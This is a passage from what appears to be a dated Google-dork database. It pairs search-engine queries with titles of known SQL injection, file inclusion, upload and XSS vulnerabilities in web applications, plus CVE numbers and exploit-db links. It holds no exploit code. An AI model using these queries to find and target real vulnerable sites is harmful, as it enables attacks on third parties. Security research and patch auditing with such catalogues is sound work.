VisualCaster - CVE: 2010-2853: http://www.exploit-db.com/exploits/12451", "submited": "2010-11-15", "request": "Powered by iScripts VisualCaster", "id": 2365}, {"short description": "JBC explorer [ by Psykokwak & XaV ]", "long description": "Explorer V7.20 Cross Site Scripting Vulnerability: http://www.exploit-db.com/exploits/10566", "submited": "2010-11-15", "request": "JBC explorer [ by Psykokwak & XaV ]", "id": 2366}, {"short description": "\"Powered by DesClub.com - phpLinkat\"", "long description": "phpLinkat 0.1 Insecure Cookie Handling / SQL Injection Vulnerability - CVE: 2008-3407: http://www.exploit-db.com/exploits/6140", "submited": "2010-11-15", "request": "\"Powered by DesClub.com - phpLinkat\"", "id": 2367}, {"short description": "Powered by: Zanfi Solutions", "long description": "Zanfi CMS lite / Jaw Portal free (page) SQL Injection Vulnerability - CVE: 2008-4159: http://www.exploit-db.com/exploits/6423", "submited": "2010-11-15", "request": "Powered by: Zanfi Solutions", "id": 2368}, {"short description": "inurl:\"com_equipment\"", "long description": "Joomla Component (com_equipment) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14655", "submited": "2010-11-15", "request": "inurl:\"com_equipment\"", "id": 2369}, {"short description": "\"Everyone should be on TV! Now you can upload 2 TV\"", "long description": "Youtuber Clone (ugroups.php UID) Remote SQL Injection Vulnerability - CVE: 2008-3419: http://www.exploit-db.com/exploits/6147", "submited": "2010-11-15", "request": "\"Everyone should be on TV! 
Now you can upload 2 TV\"", "id": 2371}, {"short description": "\" created by creato.biz \"", "long description": "Creato Script SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12807", "submited": "2010-11-15", "request": "\" created by creato.biz \"", "id": 2376}, {"short description": "\"Powered by: Southburn\"", "long description": "southburn Web (products.php) Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11430", "submited": "2010-11-15", "request": "\"Powered by: Southburn\"", "id": 2378}, {"short description": "\"powered by Blue Dove Web Design\"", "long description": "Blue Dove Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11360", "submited": "2010-11-15", "request": "\"powered by Blue Dove Web Design\"", "id": 2380}, {"short description": "infusions/raidtracker_panel/thisraidprogress.php?", "long description": "PHP-Fusion Mod raidtracker_panel (INFO_RAID_ID) SQL Injection - CVE: 2008-4521: http://www.exploit-db.com/exploits/6682", "submited": "2010-11-15", "request": "infusions/raidtracker_panel/thisraidprogress.php?", "id": 2381}, {"short description": "inurl:\"phpsecurepages\"", "long description": "phpSecurePages 0.28b (secure.php) Remote File Include Vulnerability: http://www.exploit-db.com/exploits/2452", "submited": "2010-11-15", "request": "inurl:\"phpsecurepages\"", "id": 2383}, {"short description": "allinurl: \"index.php?mod=galerie\"action=gal", "long description": "KwsPHP Module Galerie (id_gal) Remote SQL Injection Vulnerability - CVE: 2008-6197: http://www.exploit-db.com/exploits/5350", "submited": "2010-11-15", "request": "allinurl: \"index.php?mod=galerie\"action=gal", "id": 2384}, {"short description": "Site cree avec GuppY v4.5.18", "long description": "GuppY v4.5.18 Blind SQL/XPath injection Vulnerability - CVE: 2010-1740: http://www.exploit-db.com/exploits/12484", "submited": "2010-11-15", "request": "Site cree avec GuppY v4.5.18", "id": 2387}, {"short description": "intext:\"Powered by 
WSN Links Basic Edition\"", "long description": "WSN Links Basic Edition (displaycat catid) SQL Injection Vulnerbility - CVE: 2007-3981: http://www.exploit-db.com/exploits/4209", "submited": "2010-11-15", "request": "intext:\"Powered by WSN Links Basic Edition\"", "id": 2388}, {"short description": "inurl:\"/index.php?option=com_rsfiles\"", "long description": "Joomla Component RSfiles 1.0.2 (path) File Download Vulnerability - CVE: 2007-4504: http://www.exploit-db.com/exploits/4307", "submited": "2010-11-15", "request": "inurl:\"/index.php?option=com_rsfiles\"", "id": 2389}, {"short description": "Powered By AstroSPACES", "long description": "AstroSPACES (id) Remote SQL Injection Vulnerability - CVE: 2008-4642: http://www.exploit-db.com/exploits/6758", "submited": "2010-11-15", "request": "Powered By AstroSPACES", "id": 2391}, {"short description": "Powered by FluentCMS", "long description": "FluentCMS (view.php sid) Remote SQL Injection Vulnerability - CVE: 2008-6642: http://www.exploit-db.com/exploits/5509", "submited": "2010-11-15", "request": "Powered by FluentCMS", "id": 2393}, {"short description": "inurl:dpage.php?docID", "long description": "The Real Estate Script (dpage.php docID) SQL Injection Vulnerability - CVE: 2008-2443: http://www.exploit-db.com/exploits/5610", "submited": "2010-11-15", "request": "inurl:dpage.php?docID", "id": 2394}, {"short description": "inurl:\"index.php?option=com_iproperty\"", "long description": "Joomla Component (com_iproperty) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14450", "submited": "2010-11-15", "request": "inurl:\"index.php?option=com_iproperty\"", "id": 2397}, {"short description": "\"Powered by WebStudio eCatalogue\"", "long description": "WebStudio eCatalogue (pageid) Blind SQL Injection Vulnerability - CVE: 2008-5294: http://www.exploit-db.com/exploits/7223", "submited": "2010-11-15", "request": "\"Powered by WebStudio eCatalogue\"", "id": 2398}, {"short description": "powered by JAF CMS 
2004 - 2006", "long description": "JAF CMS 4.0 RC1 Multiple Remote File Include Vulnerabilities - CVE: 2006-7127: http://www.exploit-db.com/exploits/2474", "submited": "2010-11-15", "request": "powered by JAF CMS 2004 - 2006", "id": 2400}, {"short description": "\"Powered by NovaBoard v1.1.2\"", "long description": "NovaBoard v1.1.2 SQL Injection Vulnerability - CVE: 2010-0608: http://www.exploit-db.com/exploits/11278", "submited": "2010-11-15", "request": "\"Powered by NovaBoard v1.1.2\"", "id": 2402}, {"short description": "inurl:/downlot.php?file=", "long description": "Lokomedia CMS (sukaCMS) Local File Disclosure Vulnerability - CVE: 2010-2018: http://www.exploit-db.com/exploits/12651", "submited": "2010-11-15", "request": "inurl:/downlot.php?file=", "id": 2404}, {"short description": "\"Powered by Fantastic News v2.1.2\" or \"Powered by Fantastic News v2.1.3\"", "long description": "Fantastic News 2.1.3 (script_path) Remote File Include Vulnerability - CVE: 2006-4285: http://www.exploit-db.com/exploits/2221", "submited": "2010-11-15", "request": "\"Powered by Fantastic News v2.1.2\" or \"Powered by Fantastic News v2.1.3\"", "id": 2405}, {"short description": "inurl:treplies.asp?message= intitle:ASP Talk", "long description": "ASP Talk (SQL/CSS) Multiple Remote Vulnerabilities: http://www.exploit-db.com/exploits/7378", "submited": "2010-11-15", "request": "inurl:treplies.asp?message= intitle:ASP Talk", "id": 2407}, {"short description": "inurl:\"read.asp?fID=\"", "long description": "JiRo?s FAQ Manager (read.asp fID) SQL Injection Vulnerability - CVE: 2008-2691: http://www.exploit-db.com/exploits/5753", "submited": "2010-11-15", "request": "inurl:\"read.asp?fID=\"", "id": 2408}, {"short description": "\"MidiCart PHP Database Management\"", "long description": "MidiCart PHP,ASP Shell Upload Vulnerability: http://www.exploit-db.com/exploits/12636", "submited": "2010-11-15", "request": "\"MidiCart PHP Database Management\"", "id": 2409}, {"short description": 
"\"Powered By The Black Lily 2007\"", "long description": "Black Lily 2007 (products.php class) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/4444", "submited": "2010-11-15", "request": "\"Powered By The Black Lily 2007\"", "id": 2410}, {"short description": "inurl:\"simpleblog3\"", "long description": "SimpleBlog 3.0 (simpleBlog.mdb) Database Disclosure Vulnerability: http://www.exploit-db.com/exploits/7232", "submited": "2010-11-15", "request": "inurl:\"simpleblog3\"", "id": 2411}, {"short description": "allinurl:/m2f_usercp.php?", "long description": "mail2forum phpBB Mod 1.2 (m2f_root_path) Remote Include Vulns - CVE: 2006-3735: http://www.exploit-db.com/exploits/2019", "submited": "2010-11-15", "request": "allinurl:/m2f_usercp.php?", "id": 2412}, {"short description": "powered by Dreampics Builder", "long description": "Dreampics Builder (page) Remote SQL Injection Vulnerability - CVE: 2008-3119: http://www.exploit-db.com/exploits/6034", "submited": "2010-11-15", "request": "powered by Dreampics Builder", "id": 2413}, {"short description": "inurl:\"classifide_ad.php\"", "long description": "AJ Auction 6.2.1 (classifide_ad.php) SQL Injection Vulnerability - CVE: 2008-5212: http://www.exploit-db.com/exploits/5591", "submited": "2010-11-15", "request": "inurl:\"classifide_ad.php\"", "id": 2414}, {"short description": "[ Web Wiz Forums version 9.64 [Free Express Edition] ]", "long description": "Web Wiz Forums v9.64 Database Disclosure Vulnerability: http://www.exploit-db.com/exploits/10638", "submited": "2010-11-15", "request": "[ Web Wiz Forums version 9.64 [Free Express Edition] ]", "id": 2415}, {"short description": "inurl:/jobsearchengine/", "long description": "I-Net MLM Script Engine SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14080", "submited": "2010-11-15", "request": "inurl:/jobsearchengine/", "id": 2417}, {"short description": "allinurl:\"com_n-gallery\"", "long description": "Mambo Component n-gallery 
Multiple SQL Injection Vulnerabilities: http://www.exploit-db.com/exploits/5980", "submited": "2010-11-15", "request": "allinurl:\"com_n-gallery\"", "id": 2419}, {"short description": "Copyright 2006 Flax Article Manager v1.1", "long description": "Flax Article Manager 1.1 Remote PHP Script Upload Vulnerability: http://www.exploit-db.com/exploits/7884", "submited": "2010-11-15", "request": "Copyright 2006 Flax Article Manager v1.1", "id": 2421}, {"short description": "inurl:com_pinboard", "long description": "Joomla Component com_pinboard Remote File Upload Vulnerability: http://www.exploit-db.com/exploits/9011", "submited": "2010-11-15", "request": "inurl:com_pinboard", "id": 2424}, {"short description": "\"2005-2006 Powered by eSyndiCat Link Exchange Script\"", "long description": "eSyndiCat Link Exchange Script 2005-2006 SQL Injection Vulnerability - CVE: 2007-6543: http://www.exploit-db.com/exploits/4791", "submited": "2010-11-15", "request": "\" 2005-2006 Powered by eSyndiCat Link Exchange Script\"", "id": 2425}, {"short description": "cat_sell.php?cid= or selloffers.php?cid=", "long description": "B2B Trading Marketplace SQL Injection Vulnerability - CVE: 2005-3937: http://www.exploit-db.com/exploits/10656", "submited": "2010-11-15", "request": "cat_sell.php?cid= or selloffers.php?cid=", "id": 2426}, {"short description": "\"Powered By Azadi Network\"", "long description": "Azadi Network (page) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10830", "submited": "2010-11-15", "request": "\"Powered By Azadi Network\"", "id": 2427}, {"short description": "\"Powered by i-pos Storefront\"", "long description": "I-Pos Internet Pay Online Store 1.3 Beta SQL Injection Vulnerability - CVE: 2008-2634: http://www.exploit-db.com/exploits/5717", "submited": "2010-11-15", "request": "\"Powered by i-pos Storefront\"", "id": 2428}, {"short description": "intitle:\"ASP inline corporate calendar\" inurl:.asp?id=", "long description": "ASP Inline 
Corporate Calendar (SQL/XSS) Multiple Remote Vulnerabilities - CVE: 2009-2243: http://www.exploit-db.com/exploits/8756", "submited": "2010-11-15", "request": "intitle:\"ASP inline corporate calendar\" inurl:.asp?id=", "id": 2429}, {"short description": "inurl:friend.php?op=FriendSend", "long description": "PHP-Nuke 'friend.php' Module Remote SQL Injection: http://www.exploit-db.com/exploits/12525", "submited": "2010-11-15", "request": "inurl:friend.php?op=FriendSend", "id": 2430}, {"short description": "inurl:com_gamesbox", "long description": "Joomla Component Gamesbox com_gamesbox 1.0.2 (id) SQL Injection Vulnerability - CVE: 2010-2690: http://www.exploit-db.com/exploits/14126", "submited": "2010-11-15", "request": "inurl:com_gamesbox", "id": 2431}, {"short description": "\"Powered by INVOhost\"", "long description": "INVOhost SQL Injection - CVE: 2010-1336: http://www.exploit-db.com/exploits/11874", "submited": "2010-11-15", "request": "\"Powered by INVOhost\"", "id": 2432}, {"short description": "\"Powered by WebStudio eHotel\"", "long description": "WebStudio eHotel (pageid) Blind SQL Injection Vulnerability - CVE: 2008-5293: http://www.exploit-db.com/exploits/7222", "submited": "2010-11-15", "request": "\"Powered by WebStudio eHotel\"", "id": 2433}, {"short description": "inurl:com_redshop", "long description": "Joomla redSHOP Component v1.0 (com_redshop pid) SQL Injection Vulnerability - CVE: 2010-2694: http://www.exploit-db.com/exploits/14312", "submited": "2010-11-15", "request": "inurl:com_redshop", "id": 2435}, {"short description": "\"Powered by yacs\"", "long description": "YACS CMS 8.11 update_trailer.php Remote File Inclusion Vulnerability: http://www.exploit-db.com/exploits/8066", "submited": "2010-11-15", "request": "\"Powered by yacs\"", "id": 2436}, {"short description": "\"(C) by CyberTeddy\"", "long description": "WebLog (index.php file) Remote File Disclosure Vulnerability - CVE: 2007-1487: http://www.exploit-db.com/exploits/3484", "submited": 
"2010-11-15", "request": "\"(C) by CyberTeddy\"", "id": 2437}, {"short description": "\"Powered by Shout!\"", "long description": "ShoutCMS (content.php) Blind Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11305", "submited": "2010-11-15", "request": "\"Powered by Shout!\"", "id": 2438}, {"short description": "\"2007 BookmarkX script\"", "long description": "BookmarkX script 2007 (topicid) Remote SQL Injection Vulnerability - CVE: 2008-0695: http://www.exploit-db.com/exploits/5040", "submited": "2010-11-15", "request": "\"2007 BookmarkX script\"", "id": 2440}, {"short description": "Doop CMS", "long description": "doop CMS 1.3.7 (page) Local File Inclusion Vulnerability - CVE: 2007-5465: http://www.exploit-db.com/exploits/4536", "submited": "2010-11-15", "request": "Doop CMS", "id": 2441}, {"short description": "\"powered by sazcart\"", "long description": "SazCart 1.5 (cart.php) Remote File Include Vulnerability - CVE: 2006-5727: http://www.exploit-db.com/exploits/2718", "submited": "2010-11-15", "request": "\"powered by sazcart\"", "id": 2442}, {"short description": "inurl:com_community", "long description": "Joomla Template BizWeb com_community Persistent XSS Vulnerability: http://www.exploit-db.com/exploits/13955", "submited": "2010-11-15", "request": "inurl:com_community", "id": 2443}, {"short description": "allinurl:\"/questcms/\"", "long description": "Questcms (XSS/Directory Traversal/SQL) Multiple Remote Vulnerabilities - CVE: 2008-4773: http://www.exploit-db.com/exploits/6853", "submited": "2010-11-15", "request": "allinurl:\"/questcms/\"", "id": 2444}, {"short description": "inurl:news.php?mode=voir", "long description": "TR News 2.1 (nb) Remote SQL Injection Vulnerability - CVE: 2008-1957: http://www.exploit-db.com/exploits/5483", "submited": "2010-11-15", "request": "inurl:news.php?mode=voir", "id": 2446}, {"short description": "\" Powered by Pie Cart Pro \"", "long description": "Pie Cart Pro (Home_Path) Remote File Include 
Vulnerability - CVE: 2006-4970: http://www.exploit-db.com/exploits/2392", "submited": "2010-11-15", "request": "\" Powered by Pie Cart Pro \"", "id": 2447}, {"short description": "allinurl:readmore.php?news_id", "long description": "PHP-Fusion v4.01 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12635", "submited": "2010-11-15", "request": "allinurl:readmore.php?news_id", "id": 2448}, {"short description": "inurl:index.php?ini[langpack]=", "long description": "Weatimages 1.7.1 ini[langpack] Remote File Inclusion Vulnerability - CVE: 2007-1999: http://www.exploit-db.com/exploits/3700", "submited": "2010-11-15", "request": "inurl:index.php?ini[langpack]=", "id": 2449}, {"short description": "\"Powered by Elgg, the leading open source social networking platform\"", "long description": "elgg 1.5 (/_css/js.php) Local File Inclusion Vulnerability - CVE: 2009-3149: http://www.exploit-db.com/exploits/9355", "submited": "2010-11-15", "request": "\"Powered by Elgg, the leading open source social networking platform\"", "id": 2450}, {"short description": "inurl:/index.php?option=com_yellowpages", "long description": "Joomla Yellowpages SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14592", "submited": "2010-11-15", "request": "inurl:/index.php?option=com_yellowpages", "id": 2451}, {"short description": "allinurl:\"channel_detail.php?chid=\"", "long description": "YouTube Clone Script (msg.php id) Remote SQL Injection Vulnerability - CVE: 2007-3518: http://www.exploit-db.com/exploits/4136", "submited": "2010-11-15", "request": "allinurl:\"channel_detail.php?chid=\"", "id": 2452}, {"short description": "inurl:apages.php", "long description": "Arab Network Tech. 
(ANT) CMS SQL Injection: http://www.exploit-db.com/exploits/11339", "submited": "2010-11-15", "request": "inurl:apages.php", "id": 2453}, {"short description": "\"Emanuele Guadagnoli\" \"CcMail\"", "long description": "CcMail", "submited": "2010-11-15", "request": "\"Emanuele Guadagnoli\" \"CcMail\"", "id": 2454}, {"short description": "This FAQ is powered by CascadianFAQ", "long description": "CascadianFAQ 4.1 (index.php) Remote SQL Injection Vulnerability - CVE: 2007-0631: http://www.exploit-db.com/exploits/3227", "submited": "2010-11-15", "request": "This FAQ is powered by CascadianFAQ", "id": 2456}, {"short description": "\"Designed & Developed by net-finity\"", "long description": "net-finity (links.php) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/4629", "submited": "2010-11-15", "request": "\"Designed & Developed by net-finity\"", "id": 2457}, {"short description": "intext:Powered by CPA Site Solutions", "long description": "CPA Site Solutions Remote File Upload Vulnerability: http://www.exploit-db.com/exploits/11365", "submited": "2010-11-15", "request": "intext:Powered by CPA Site Solutions", "id": 2458}, {"short description": "\"site powered by intuitive-websites.com\"", "long description": "intuitive (form.php) Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11481", "submited": "2010-11-15", "request": "\"site powered by intuitive-websites.com\"", "id": 2460}, {"short description": "ClearBudget v0.6.1", "long description": "ClearBudget 0.6.1 Insecure Cookie Handling / LFI Vulnerabilities: http://www.exploit-db.com/exploits/7992", "submited": "2010-11-15", "request": "ClearBudget v0.6.1", "id": 2461}, {"short description": "inurl:func=selectcat + com_remository", "long description": "Mambo Component RemoSitory (cat) Remote SQL Injection Vulnerability - CVE: 2007-4505: http://www.exploit-db.com/exploits/4306", "submited": "2010-11-15", "request": "inurl:func=selectcat + com_remository", "id": 2464}, {"short 
description": "\"ShopMaker v1.0\"", "long description": "ShopMaker 1.0 (product.php id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6799", "submited": "2010-11-15", "request": "\"ShopMaker v1.0\"", "id": 2465}, {"short description": "\"Powered by jSite 1.0 OE\"", "long description": "jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities - CVE: 2008-3192: http://www.exploit-db.com/exploits/6057", "submited": "2010-11-15", "request": "\"Powered by jSite 1.0 OE\"", "id": 2466}, {"short description": "Powered by Online Email Manager", "long description": "Online Email Manager Insecure Cookie Handling Vulnerability: http://www.exploit-db.com/exploits/8476", "submited": "2010-11-15", "request": "Powered by Online Email Manager", "id": 2467}, {"short description": "\"Web Site Design by Red Cat Studios\"", "long description": "Realtor WebSite System E-Commerce idfestival SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12776", "submited": "2010-11-15", "request": "\"Web Site Design by Red Cat Studios\"", "id": 2468}, {"short description": "inurl:\"webboard/view.php?topic=\"", "long description": "Webboard v.2.90 beta Remote File Disclosure Vulnerability - CVE: 2009-2600: http://www.exploit-db.com/exploits/8823", "submited": "2010-11-15", "request": "inurl:\"webboard/view.php?topic=\"", "id": 2471}, {"short description": "/index.php?option=com_restaurante", "long description": "Joomla Component Restaurante Remote File Upload Vulnerability - CVE: 2007-4817: http://www.exploit-db.com/exploits/4383", "submited": "2010-11-15", "request": "/index.php?option=com_restaurante", "id": 2472}, {"short description": "inurl:\"com_portfol\"", "long description": "Joomla Component Portfol (vcatid) SQL Injection Vulnerability - CVE: 2009-0494: http://www.exploit-db.com/exploits/7734", "submited": "2010-11-15", "request": "inurl:\"com_portfol\"", "id": 2473}, {"short description": "Copyright 2010 ASP SiteWare. 
All rights reserved.", "long description": "MSSQLi Vulnerability in AutoDealer Ver.1 and Ver.2 - CVE: 2007-0053: http://www.exploit-db.com/exploits/12462", "submited": "2010-11-15", "request": "Copyright 2010 ASP SiteWare. All rights reserved.", "id": 2476}, {"short description": "intitle:\"DUcalendar 1.0\"", "long description": "DUcalendar 1.0 (detail.asp iEve) Remote SQL Injection Vulnerability - CVE: 2008-2868: http://www.exploit-db.com/exploits/5927", "submited": "2010-11-15", "request": "intitle:\"DUcalendar 1.0\"", "id": 2477}, {"short description": "inurl:/infusions/e_cart", "long description": "PHP-Fusion Mod E-Cart 1.3 (items.php CA) SQL Injection Vulnerability - CVE: 2009-0832: http://www.exploit-db.com/exploits/7698", "submited": "2010-11-15", "request": "inurl:/infusions/e_cart", "id": 2479}, {"short description": "intext:\"RPG Inferno is not available to guests\" or intext:\"Battle Ground A Clans A Store A Jobs A Auction A Spells Shop A Statistics A Member List\"", "long description": "vBulletin Mod RPG Inferno 2.4 (inferno.php) SQL Injection Vulnerability - CVE: 2007-3687: http://www.exploit-db.com/exploits/4166", "submited": "2010-11-15", "request": "intext:\"RPG Inferno is not available to guests\" or intext:\"Battle Ground A Clans A Store A Jobs A Auction A Spells Shop A Statistics A Member List\"", "id": 2480}, {"short description": ": Find it yourself ;)", "long description": "http://www.exploit-db.com/exploits/5756", "submited": "2010-11-15", "request": "", "id": 2481}, {"short description": "inurl:com_jstore", "long description": "joomla com_jstore SQLi Vulnerability: http://www.exploit-db.com/exploits/13796", "submited": "2010-11-15", "request": "inurl:com_jstore", "id": 2484}, {"short description": "APBoard 2.1.0 2003-2010 APP - Another PHP Program", "long description": "APBoard v2.1.0 ( board.php?id=) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14559", "submited": "2010-11-15", "request": "APBoard 2.1.0 2003-2010 APP - 
Another PHP Program", "id": 2485}, {"short description": "allintext:\"Browse our directory of our members top sites or create your own for free!\"", "long description": "PHP123 Top Sites (category.php cat) Remote SQL Injection Vuln - CVE: 2007-4054: http://www.exploit-db.com/exploits/4241", "submited": "2010-11-15", "request": "allintext:\"Browse our directory of our members top sites or create your own for free!\"", "id": 2486}, {"short description": "allinurl:flashblog.html \"flashblog\"", "long description": "FlashBlog (articulo_id) Remote SQL Injection Vulnerability - CVE: 2008-2572: http://www.exploit-db.com/exploits/5685", "submited": "2010-11-15", "request": "allinurl:flashblog.html \"flashblog\"", "id": 2487}, {"short description": "com_easybook", "long description": "Joomla Component EasyBook 1.1 (gbid) SQL Injection - CVE: 2008-2569: http://www.exploit-db.com/exploits/5740", "submited": "2010-11-15", "request": "com_easybook", "id": 2489}, {"short description": "inurl:index.php?option=com_nicetalk", "long description": "Joomla Component Nice Talk 0.9.3 (tagid) SQL Injection Vulnerability - CVE: 2007-4503: http://www.exploit-db.com/exploits/4308", "submited": "2010-11-15", "request": "inurl:index.php?option=com_nicetalk", "id": 2490}, {"short description": "\"ParsBlogger ? 2006. All rights reserved\"", "long description": "ParsBlogger (links.asp id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6745", "submited": "2010-11-15", "request": "\"ParsBlogger ? 2006. 
All rights reserved\"", "id": 2491}, {"short description": "Powered by CMScout (c)2005 CMScout Group", "long description": "CMScout (XSS/HTML Injection) Multiple Vulnerabilities - CVE: 2010-2154: http://www.exploit-db.com/exploits/12806", "submited": "2010-11-15", "request": "Powered by CMScout (c)2005 CMScout Group", "id": 2492}, {"short description": "powered by minimal Gallery 0.8", "long description": "minimal Gallery 0.8 Remote File Disclosure Vulnerability - CVE: 2008-0259: http://www.exploit-db.com/exploits/4902", "submited": "2010-11-15", "request": "powered by minimal Gallery 0.8", "id": 2493}, {"short description": "powered by sX-Shop", "long description": "sX-Shop (view_image.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14557", "submited": "2010-11-15", "request": "powered by sX-Shop", "id": 2494}, {"short description": "inurl:\"com_ignitegallery\"", "long description": "Joomla Component Ignite Gallery 0.8.3 SQL Injection Vulnerability - CVE: 2008-6182: http://www.exploit-db.com/exploits/6723", "submited": "2010-11-15", "request": "inurl:\"com_ignitegallery\"", "id": 2495}, {"short description": "inurl:com_brightweblinks", "long description": "Joomla Component com_brightweblinks (catid) SQL Injection Vulnerability - CVE: 2008-3083: http://www.exploit-db.com/exploits/5993", "submited": "2010-11-15", "request": "inurl:com_brightweblinks", "id": 2497}, {"short description": "\"Powered by: PhotoPost PHP 4.6\" or \"Powered by: PhotoPost PHP 4.5\"", "long description": "PhotoPost 4.6 (PP_PATH) Remote File Include Vulnerability - CVE: 2006-4828: http://www.exploit-db.com/exploits/2369", "submited": "2010-11-15", "request": "\"Powered by: PhotoPost PHP 4.6\" or \"Powered by: PhotoPost PHP 4.5\"", "id": 2498}, {"short description": "Powered by odlican.net cms v.1.5", "long description": "odlican.net cms v.1.5 Remote File Upload Vulnerability: http://www.exploit-db.com/exploits/11340", "submited": "2010-11-15", "request": "Powered by 
odlican.net cms v.1.5", "id": 2501}, {"short description": "Powered By form2list", "long description": "form2list (page.php id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/8348", "submited": "2010-11-15", "request": "Powered By form2list", "id": 2502}, {"short description": "inurl:/_blogadata/", "long description": "Blogator-script 0.95 (id_art) Remote SQL Injection Vulnerability - CVE: 2008-1763: http://www.exploit-db.com/exploits/5368", "submited": "2010-11-15", "request": "inurl:/_blogadata/", "id": 2503}, {"short description": "SPBOARD v4.5", "long description": "Sepal SPBOARD 4.5 (board.cgi) Remote Command Exec Vulnerability - CVE: 2008-4873: http://www.exploit-db.com/exploits/6864", "submited": "2010-11-15", "request": "SPBOARD v4.5", "id": 2505}, {"short description": "inurl:com_jmarket", "long description": "joomla com_jmarket SQLi Vulnerability: http://www.exploit-db.com/exploits/13799", "submited": "2010-11-15", "request": "inurl:com_jmarket", "id": 2506}, {"short description": "inurl:com_jtickets", "long description": "joomla com_jtickets SQLi Vulnerability: http://www.exploit-db.com/exploits/13797", "submited": "2010-11-15", "request": "inurl:com_jtickets", "id": 2507}, {"short description": "inurl:\"com_rwcards\"", "long description": "Joomla Component com_rwcards - Local File Inclusion: http://www.exploit-db.com/exploits/11772", "submited": "2010-11-15", "request": "inurl:\"com_rwcards\"", "id": 2509}, {"short description": "\"index.php?sbjoke_id=\"", "long description": "Jokes & Funny Pics Script (sb_jokeid) SQL Injection Vulnerability - CVE: 2008-2874: http://www.exploit-db.com/exploits/5934", "submited": "2010-11-15", "request": "\"index.php?sbjoke_id=\"", "id": 2510}, {"short description": "\"This website was created with phpWebThings\"", "long description": "phpWebThings 1.5.2 (editor.php) Remote File Include Vulnerability - CVE: 2006-6042: http://www.exploit-db.com/exploits/2811", "submited": "2010-11-15", "request": 
"\"This website was created with phpWebThings\"", "id": 2511}, {"short description": "inurl:questions.php?idcat", "long description": "EsFaq 2.0 (idcat) Remote SQL Injection Vulnerability - CVE: 2008-3952: http://www.exploit-db.com/exploits/6383", "submited": "2010-11-15", "request": "inurl:questions.php?idcat", "id": 2512}, {"short description": "photokorn 1.52", "long description": "PhotoKorn Gallery 1.52 (dir_path) Remote File Include Vulnerabilities - CVE: 2006-4670: http://www.exploit-db.com/exploits/2327", "submited": "2010-11-15", "request": "photokorn 1.52", "id": 2513}, {"short description": "Powered by SAPID CMF Build 87", "long description": "SAPID CMF Build 87 (last_module) Remote Code Execution Vulnerability - CVE: 2007-5056: http://www.exploit-db.com/exploits/5097", "submited": "2010-11-15", "request": "Powered by SAPID CMF Build 87", "id": 2514}, {"short description": "inurl:\"directory.php?cat=\" pubs", "long description": "Prozilla Pub Site Directory (directory.php cat) SQL Injection Vulnerbility - CVE: 2007-4258: http://www.exploit-db.com/exploits/4265", "submited": "2010-11-15", "request": "inurl:\"directory.php?cat=\" pubs", "id": 2515}, {"short description": "inurl:\"userjournals.php?blog.\"", "long description": "e107 Plugin userjournals_menu (blog.id) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/8417", "submited": "2010-11-15", "request": "inurl:\"userjournals.php?blog.\"", "id": 2517}, {"short description": "inurl:\"com_youtube\"", "long description": "Joomla Component (com_youtube) SQL Injection Vulnerability - CVE: 2010-2923: http://www.exploit-db.com/exploits/14467", "submited": "2010-11-15", "request": "inurl:\"com_youtube\"", "id": 2518}, {"short description": "inurl:\"index.php?serverid=\"", "long description": "Ultrastats 0.2.144/0.3.11 (index.php serverid) SQL Injection Vulnerability - CVE: 2008-6260: http://www.exploit-db.com/exploits/7148", "submited": "2010-11-15", "request": "inurl:\"index.php?serverid=\"", 
"id": 2519}, {"short description": "inurl:\"com_photoblog\"", "long description": "Joomla (com_photoblog) Blind Sql Injection Vulnerability - CVE: 2010-0610: http://www.exploit-db.com/exploits/11337", "submited": "2010-11-15", "request": "inurl:\"com_photoblog\"", "id": 2523}, {"short description": "inurl:indexmess.php", "long description": "Messagerie Locale (centre.php) Remote File Inclusion Vulnerability: http://www.exploit-db.com/exploits/2832", "submited": "2010-11-15", "request": "inurl:indexmess.php", "id": 2524}, {"short description": "Powered by phpFaber URLInn. Copyright 2004-2006 phpFaber", "long description": "phpFaber URLInn 2.0.5 (dir_ws) Remote File Inclusion Vulnerability - CVE: 2007-5754: http://www.exploit-db.com/exploits/4588", "submited": "2010-11-15", "request": "Powered by phpFaber URLInn. Copyright 2004-2006 phpFaber", "id": 2525}, {"short description": "inurl:com_joomradio", "long description": "Joomla Component joomradio 1.0 (id) SQL Injection Vulnerability - CVE: 2008-2633: http://www.exploit-db.com/exploits/5729", "submited": "2010-11-15", "request": "inurl:com_joomradio", "id": 2526}, {"short description": "inurl:com_jnewsletter", "long description": "joomla com_jnewsletter SQLi Vulnerability: http://www.exploit-db.com/exploits/13804", "submited": "2010-11-15", "request": "inurl:com_jnewsletter", "id": 2527}, {"short description": "inurl:inc_classifiedlistingsmanager.asp", "long description": "DMXReady Classified Listings Manager 1.1 SQL Injection Vulnerability - CVE: 2009-0426: http://www.exploit-db.com/exploits/7767", "submited": "2010-11-15", "request": "inurl:inc_classifiedlistingsmanager.asp", "id": 2528}, {"short description": "Powered by Online Guestbook Pro", "long description": "Online Guestbook Pro (display) Blind SQL Injection Vulnerability: http://www.exploit-db.com/exploits/8475", "submited": "2010-11-15", "request": "Powered by Online Guestbook Pro", "id": 2529}, {"short description": "\"Powered by PG Online Training 
